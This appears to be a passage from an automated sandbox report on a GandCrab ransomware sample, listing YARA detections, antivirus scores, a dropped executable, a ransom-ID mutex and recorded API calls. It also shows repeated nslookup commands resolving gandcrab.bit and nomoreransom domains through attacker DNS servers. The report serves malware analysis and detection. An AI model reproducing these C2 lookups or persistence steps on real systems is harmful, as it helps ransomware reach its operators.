                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, type: DROPPEDMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, type: DROPPEDMatched rule: Gandcrab Payload Author: kevoreilly
                        Source: gI5xZdIxUs.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: gI5xZdIxUs.exe, type: SAMPLEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                        Source: gI5xZdIxUs.exe, type: SAMPLEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                        Source: gI5xZdIxUs.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                        Source: gI5xZdIxUs.exe, type: SAMPLEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                        Source: 14.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                        Source: 14.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                        Source: 14.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                        Source: 14.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                        Source: 14.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                        Source: 14.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                        Source: 14.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                        Source: 14.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                        Source: 20.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                        Source: 20.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                        Source: 20.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                        Source: 20.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                        Source: 1.0.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                        Source: 1.0.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                        Source: 1.0.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                        Source: 1.0.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                        Source: 20.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                        Source: 20.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                        Source: 20.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                        Source: 20.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                        Source: 1.2.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                        Source: 1.2.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                        Source: 1.2.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                        Source: 1.2.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                        Source: Process Memory Space: gI5xZdIxUs.exe PID: 5280, type: MEMORYSTRMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, type: DROPPEDMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, type: DROPPEDMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, type: DROPPEDMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC683C01_2_0FC683C0
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC61C201_2_0FC61C20
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC610201_2_0FC61020
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 14_2_0F9D83C014_2_0F9D83C0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 14_2_0F9D1C2014_2_0F9D1C20
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 14_2_0F9D102014_2_0F9D1020
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 20_2_0F9D83C020_2_0F9D83C0
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 20_2_0F9D1C2020_2_0F9D1C20
                        Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeCode function: 20_2_0F9D102020_2_0F9D1020
                        Source: gI5xZdIxUs.exeVirustotal: Detection: 85%
                        Source: gI5xZdIxUs.exeMetadefender: Detection: 74%
                        Source: gI5xZdIxUs.exeReversingLabs: Detection: 92%
                        Source: gI5xZdIxUs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\gI5xZdIxUs.exe "C:\Users\user\Desktop\gI5xZdIxUs.exe"
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe "C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe"
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe "C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe"
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
                        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ruJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exeJump to behavior
                        Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@85/2@305/0
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC67330 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,ExitProcess,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree,1_2_0FC67330
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeCode function: 1_2_0FC646F0 CreateToolhelp32Snapshot,VirtualAlloc,Process32FirstW,CloseHandle,lstrcmpiW,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,Process32NextW,VirtualFree,FindCloseChangeNotification,1_2_0FC646F0
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1920:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1552:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5484:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5636:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1784:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4560:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1000:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4624:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1960:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:792:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5556:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:496:120:WilError_01
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=342245cbb89b1482
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
